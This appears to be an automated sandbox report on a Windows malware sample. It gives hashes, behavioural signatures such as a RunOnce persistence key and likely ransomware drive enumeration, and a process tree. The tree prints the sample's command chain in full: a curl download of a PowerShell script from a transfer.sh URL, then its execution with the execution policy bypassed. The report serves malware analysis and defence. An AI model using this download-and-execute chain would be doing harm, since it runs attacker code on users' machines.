Analysis
-
max time kernel
44s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
17/01/2023, 08:11
Static task
static1
Behavioral task
behavioral1
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
Resource
win10v2004-20221111-en
General
-
Target
{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
-
Size
547KB
-
MD5
b0ab211e83a23d58e1322e4d2d6f0a96
-
SHA1
d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
-
SHA256
3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
-
SHA512
4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
-
SSDEEP
3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 620 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2024 wrote to memory of 1788 2024 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 28 PID 2024 wrote to memory of 1788 2024 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 28 PID 2024 wrote to memory of 1788 2024 {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe 28 PID 1788 wrote to memory of 668 1788 cmd.exe 30 PID 1788 wrote to memory of 668 1788 cmd.exe 30 PID 1788 wrote to memory of 668 1788 cmd.exe 30 PID 668 wrote to memory of 1384 668 WScript.exe 31 PID 668 wrote to memory of 1384 668 WScript.exe 31 PID 668 wrote to memory of 1384 668 WScript.exe 31 PID 1384 wrote to memory of 540 1384 cmd.exe 33 PID 1384 wrote to memory of 540 1384 cmd.exe 33 PID 1384 wrote to memory of 540 1384 cmd.exe 33 PID 668 wrote to memory of 1128 668 WScript.exe 34 PID 668 wrote to memory of 1128 668 WScript.exe 34 PID 668 wrote to memory of 1128 668 WScript.exe 34 PID 1128 wrote to memory of 1604 1128 cmd.exe 36 PID 1128 wrote to memory of 1604 1128 cmd.exe 36 PID 1128 wrote to memory of 1604 1128 cmd.exe 36 PID 1604 wrote to memory of 620 1604 cmd.exe 37 PID 1604 wrote to memory of 620 1604 cmd.exe 37 PID 1604 wrote to memory of 620 1604 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\cmd.execmd /c new.vbs2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps15⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps16⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
300.0MB
MD5f7e7099eea0cc25fc49d04cd53c573a1
SHA13abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074